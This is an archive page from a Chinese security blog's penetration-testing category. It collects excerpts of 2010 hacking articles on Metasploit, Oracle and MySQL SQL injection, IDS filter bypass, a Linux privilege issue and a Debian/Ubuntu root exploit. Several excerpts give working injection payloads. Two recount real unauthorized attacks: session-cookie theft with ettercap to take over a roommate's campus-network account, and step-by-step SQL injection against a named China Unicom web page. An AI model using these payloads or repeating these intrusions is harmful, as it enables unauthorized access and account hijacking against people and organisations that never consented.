存档

‘渗透测试’ 分类的存档

The Operation Outbreak Attack

2010年12月28日 admin     1,324 views 没有评论

The Operation Outbreak Attack

From:http://www.exploit-db.com/papers/15833/

|=——————————————————————–=|
|=—————-=[ The Operation OutBreak Attack ]=—————–=|
|=————————–=[ 26 Dec 2010 ]=————————-=|
|=———————-=[  By CWH Underground  ]=——————–=|
|=——————————————————————–=|

######
Info
######

Title    : The Operation OutBreak Attack
Author    : ZeQ3uL  (Prathan Phongthiproek)
Retool2 (Suttapong Wara-asawapati)
Team    : CWH Underground [http://www.exploit-db.com/author/?a=1275]
Website    : www.citecclub.org
Date    : 2010-12-26

##########
Contents
##########

[0x00] – Introduction

[0x01] – OutBreak Web Application

[0x02] – OutBreak MySQL Database

[0x03] – OutBreak with Autosploit.rc

[0x04] – Outbreak to Internal Server

[0x05] – References

[0x06] – Greetz To

#######################
[0x00] – Introduction
#######################

Hi all, in this paper, we will show you my hacking method (Logs) from real world case study on some company.
Moreover, we also show the ways to use the Best Exploitation tool, Metasploit Framework (Thank HD Moore and Rapid7) that powerful than day in the past with many exploit and auxiliary (We will see it ;D)

We recommend to read previous paper “The Operation Cloudburst Attack” that guide you about methods to hacking with Metasploit Framework.

###################################
[0x01] – OutBreak Web Application
###################################

First, I use nmap for scan open port on target and found information below
阅读全文…

分类: 渗透测试 标签: , , ,

Metasploit with MYSQL in BackTrack 4 r2

2010年12月24日 admin     1,648 views 没有评论

Metasploit with MYSQL in BackTrack 4 r2
From:http://hi.baidu.com/p3rlish/blog/item/de16d790f29e749fa977a4a3.html
Until the release of BackTrack 4 r2, it was possible to get Metasploit working with MYSQL but it was not an altogether seamless experience. Now, however, Metasploit and MYSQL work together “out of the box” so we thought it would be great to highlight the integration. With the Metasploit team moving away from sqlite3, it is vital to be able to make use of a properly threaded database. There have also been quite a number of additional database commands added to Metasploit and documentation tends to be rather sparse online when it comes to the less “glamorous” side of database management.
root@bt:~# msfconsole

=[ metasploit v3.5.1-dev [core:3.5 api:1.0]
+ —-=[635 exploits - 316 auxiliary
+ ----=[215 payloads - 27 encoders - 8 nops
=[svn r11078 updated today (2010.11.19)

msf > db_driver
[*]    Active Driver: postgresql
[*]        Available: postgresql, mysql, sqlite3

We then load the mysql driver, start the mysql service and connect to the database. If the database does not already exist, Metasploit will create it for us.
msf > db_driver mysql
[*] Using database driver mysql
msf >/etc/init.d/mysql start
[*]exec: /etc/init.d/mysql start

Starting MySQL database server: mysqld.
Checking for corrupt, not cleanly closed and upgrade needing tables..
msf > db_connect
[*]    Usage: db_connect @/
[*]       OR: db_connect -y[path/to/database.yml]
[*] Examples:
[*]        db_connect user@metasploit3
[*]        db_connect user:pass@192.168.0.2/metasploit3
[*]        db_connect user:pass@192.168.0.2:1500/metasploit3
msf > db_connect root:toor@127.0.0.1/msf3
阅读全文…

分类: 渗透测试 标签: , ,

Linux 系统文件描述符继承带来的危害

2010年11月23日 admin     1,135 views 没有评论

来源:http://www.80sec.com/security-issue-on-linux-fd-inheritance.html

EMail: wofeiwo#80sec.com
Site: http://www.80sec.com
Date: 2010-11-20

[ 目录 ]
0×00 背景
0×01 POC
0×02 深入利用
0×03 解决方案及后话

0×00 前言

在初学linux编程的时候,都会知道这样一个概念:当你用fork建立一个子进程,父进程的所有内容会被“完完整整”的复制到子进程中。子进程是父进程的一个clone体,除了pid不同,其余一切相同。
再试想一下这样的场景:在Webserver中,首先会使用root权限启动,以此打开root权限才能打开的端口、日志等文件。然后降权到普通用户,fork出一些worker进程,这些进程中再进行解析脚本、写日志、输出结果等进一步操作。
然而这里,仔细思考一下,就会发现隐含一个安全问题:子进程中既然继承了父进程的FD,那么子进程中运行的PHP或其他脚本只需要继续操作这些FD,就能够使用普通权限“越权”操作root用户才能操作的文件。
阅读全文…

分类: 渗透测试 标签: , ,

Debian <=5.0.6 /Ubuntu <=10.04 Webshell-Remote-Root

2010年10月25日 admin     1,581 views 没有评论

Debian <=5.0.6 /Ubuntu <=10.04 Webshell-Remote-Root
from:http://www.exploit-db.com/papers/15311/
# Exploit Title: Debian <=5.0.6 /Ubuntu <=10.04 Webshell-Remote-Root
# Date: 24-10-2010
# Author: jmit
# Mail: fhausberger[at]gmail[dot]com
# Tested on: Debian 5.0.6
# CVE: CVE-2010-3856

————–
| DISCLAIMER |
————–

# IN NO EVENT SHALL THE COPYRIGHT OWNER OR CONTRIBUTORS BE
# LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR
# CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF
# SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS
# INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN
# CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
# ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE
# POSSIBILITY OF SUCH DAMAGE. 阅读全文…

分类: 渗透测试 标签: , , ,

oracle 注射

2010年10月9日 admin     1,634 views 4 条评论

作者:不详

来源:不详

判断是否为Oralce数据库:

And 0<>(select count(*) from dual) 返回正常页面表示为Oracle数据库

猜解字段数量:
使用order by 或者group by逐个提交数字 知道回显错误页面

列出字段数目 比如6个字段数目

and 1=1 null,null,null,null,null,null from dual-

因为ORACLE数据库是不自动匹配数据类型的,而null可以匹配任意数据类型,所以这样提交不会报错。 提交它返回了正常页面.

检测当前字段的数据类型,在null的前后加上‘’引号,如果返回正常则说明该字段为字符型,如果返回错误有可能是数字型的,如果不是数字型,那么就是其它类型
例如提交语句: and 1=1 union select null,’null’,null,’null’,null,’null’ from dual–

读取Oracle数据库版本:
把回显的数字替换成 and 1=2 union select 1,(select banner from sys.v_$version where rownum=1),3,’4′,5,’6′ from dual–
阅读全文…

分类: 渗透测试 标签: ,

Oracle web环境注射技术

2010年9月7日 admin     2,155 views 没有评论

Oracle web环境注射技术
#
#BY    剑心
#http://www.loveshell.net
#

前言

本人不是一个专业的数据库管理员,也不是一个专门研究oracle安全的研究员,文中的语句很多都写得非常不专业,对数据库理解也不够,甚至很多语句可能 在不同版本上并不适合,一些技术也是牛人们很早提到过的,本文只是从一个web安全的角度来看如何入侵一台被防火墙防护的Oracle数据库,对一些入侵 技术做了web入侵上的总结和延伸,尽量将原理讲得明白。本文也并没有对sql注射中存在的一些共性进行讨论 ,如利用substr函数和经典注射这些,而是站在oracle数据库的角度,尽量展现一些Sql注射入侵的思路以及如何利用数据库的一些特性,在web 上做最大的入侵。一些牛人的工具也即将发布出来,希望还有人喜欢手工优美的注射。

一    Oracle 简单介绍

Oracle作为一款比较早期出现的RDBMS数据库,市场占有率比较大,经常用在一些大型数据库上。它本身除了很好地支持各种SQL语句外,还提供了各 种丰富的包,存储过程,甚至支持java和创建library等特性,如此强大的功能为Hacking提供了很好的便利。

Oracle自身有很多默认的帐户,并且有很多的存储过程,这些存储过程是由系统建立的,很多默认都是对public开放的,在过去的几年里公布了很多 oracle的漏洞,包括溢出和SQL注射在内的许多漏洞。在这里面,SQL注射漏洞显得格外严重,因为在Oracle里,在不加其他关键字AUTHID CURRENT_USER的情况下,创建的存储过程在运行时是以创建者身份运行的,而public对这些存储过程都有权限调用,所以一旦自带存储过程存在 注射的话,很容易让普通用户提升到Oracle系统权限。Oracle本身内置了很多的帐户,其中一些帐户都有默认的密码并且具有CONNECT的权限, 这样如果oralce的端口没有受到防火墙的保护又可以被人远程连接的话,就可以被人利用默认帐户远程登陆进系统然后利用系统里的存储过程的SQL注射漏 洞,系统就会沦陷,当然,登陆进oracle还需要sid,不过这也并不困难,oracle的tnslintener默认没有设置密码,完全可以用 tnscmd.pl用services命令查出系统的sid(到比较新的版本,这个漏洞已经被修复了),这也是非常经典的入侵oracle的方式。
阅读全文…

分类: 渗透测试 标签:

交换机环境下利用ettercap盗取cookie劫持校内网认证会话

2010年5月24日 admin     2,378 views 1 条评论

昨天跟某舍友下象棋,说谁输了就买雪糕给对方吃。

男子汉大豆腐,焉能言而无信,谁料在我将死对方后,对方居然真的使用了绝技,死不认帐,耍赖皮。

俺只好将其行公布于校内网,结果连我们导师都鄙视那种行为,并鼓励我用板砖拍他。其他围观者也是无不愤然谴责之。谁料这厮利用舆论机器,在校内网颠倒是非、指鹿为马。偶只好进入其校内网,断其话语权,还事实真想于大众。

本来那厮用的网页登录很容易搞到其密码,谁知最近用了个校内网客户端,从那里进入网页,也就不用登录了。这下好,搞不到密码就搞他的cookie吧,反正一样。

ettercap出场,贴图

阅读全文…

分类: 渗透测试 标签: , ,

绕过IDS过滤information_schema继续注入

2010年5月13日 admin     2,181 views 1 条评论

绕过IDS过滤information_schema继续注入
来源:http://key0.cn/index.php/archives/510
mickey写的,正文如下:

原来做渗透的时候,遇到过一个站,IDS过滤了information_schema,导致后来我没有搞定,前天看文章,发现一个绕过的方法,本地测试了下,也和月牛讨论了下,最后在月牛的帮助下,把语句都构造好了,原来那个点,回去再看,也就搞定了,后来被当哥把方法给放出来了,那就公布吧。

1.本地构造测试表

mysql> create table users(id int,name varchar(20),passwd varchar(32));
Query OK, 0 rows affected (0.04 sec)

mysql> insert into users value(1,’mickey’,’827ccb0eea8a706c4c34a16891f84e7b’);
Query OK, 1 row affected (0.00 sec)

mysql> create table news(is_admin int(1),id int(2),title varchar(100),date date);
Query OK, 0 rows affected (0.00 sec)

mysql> insert into news values(1,1,’hello,mickey’,now());
Query OK, 1 row affected, 1 warning (0.00 sec)

2.暴列名

mysql> select * from (select * from users as a  join news as b) as c;
ERROR 1060 (42S21): Duplicate column name ‘id’
阅读全文…

分类: 渗透测试 标签: ,

Mysql另类盲注中的一些技巧 By oldjun

2010年5月6日 admin     2,186 views 没有评论
From:http://www.oldjun.com/blog/index.php/archives/62/
很多技巧从国外的paper学到的,不过国内没有多少人使用,所以发出来,笔记下~
一、order by 的参数注入技巧:
两种方法,思路都一样。
example. “select username,password from uc_members order by”.$_GET['oderby']
a.常见的利用方法:
1.[SQL] select username,password from uc_members order by 1,If((select 1)=2,1,(select value from uc_settings));
返回错误:[Err] 1242 – Subquery returns more than 1 row
2.[SQL] select username,password from uc_members order by 1,If((select 1)=1,1,(select value from uc_settings));
返回正常。
b.国外paper看到的方法:
1.[SQL] select username,password from uc_members order by 1,(select case when(2<1) then 1 else 1*(select username from uc_members)end)=1;
返回错误:[Err] 1242 – Subquery returns more than 1 row
2.[SQL] select username,password from uc_members order by 1,(select case when(2>1) then 1 else 1*(select username from uc_members)end)=1;
返回正常。
二、limit 的参数注入技巧:
a.order by之后的limit参数 的注入,因为正常的sql语句order by后无法接union,所以没有好办法,就一个鸡肋思路:into outfile ‘/www/root/xxx.php’;
b.limit前无order by时的注入,那就方便多了,后面可以直接接union select ,随便怎么注都行了:
分类: 渗透测试 标签: , , ,

渗透中国联通

2010年5月6日 admin     2,164 views 1 条评论
渗透中国联通
文章作者:Nicholas
渗透联通之旅,原来入侵过四川联通.
今日再次看看.发现一个jsp页面的get连接.就忍不住的想测试
http://www.sc.chinaunicom.com/local/content.jsp?localid=9
先加上  and 1=1   , and 1=2 . 貌似有注入.
普遍情况下,JSP相对采用SYBASE,MYSQL,ORACLE数据库.那就一个个测试吧.
当测试Dual表的时候返回正确了 And 0<>(select count(*) from dual)
说明是Oracle数据库.  现在数据库已经弄清楚了,可以使用order by来测试字段了.
order by 10– 返回错误.  接着order by 6的时候返回正确. order by 7返回错误.
说明6个字段. 现在构造查询语句. 其实跟MYSQL手工注入差不多
and  1=1 null,null,null,null,null,null from dual– 返回错误页面.
然后把null加上单引号测试字符类型. 还是错误页面.
还剩下一种常用数据类型. 那就是数字了.
and 1=2 union select 1,’2′,3,’4′,5,’6′ from dual–
在新闻标题和新闻内容出现了”2″   已经爆出了数据库字段位置了.
先看看数据库版本吧.
and 1=2 union select 1,’(select banner from sys.v_$version where rownum=1)’,3,’4′,5,’6′ from dual–
返回页面出现  Oracle9i Enterprise Edition Release 9.2.0.1.0 – 64bit Production
然后使用(select SYS_CONTEXT (‘USERENV’, ‘CURRENT_USER’) from dual)来爆数据库用户名吧
用户名爆出来了CHINAUNICOM
接着通过logfile函数获取日志文件路径.(select member from v$logfile where rownum=1)
出现/oracle/oradata/uniscdb/redo03.log   看这个路径,说明不会是WIN系统平台.是LINUX或许UNIX或许其他的
分类: 渗透测试 标签: , ,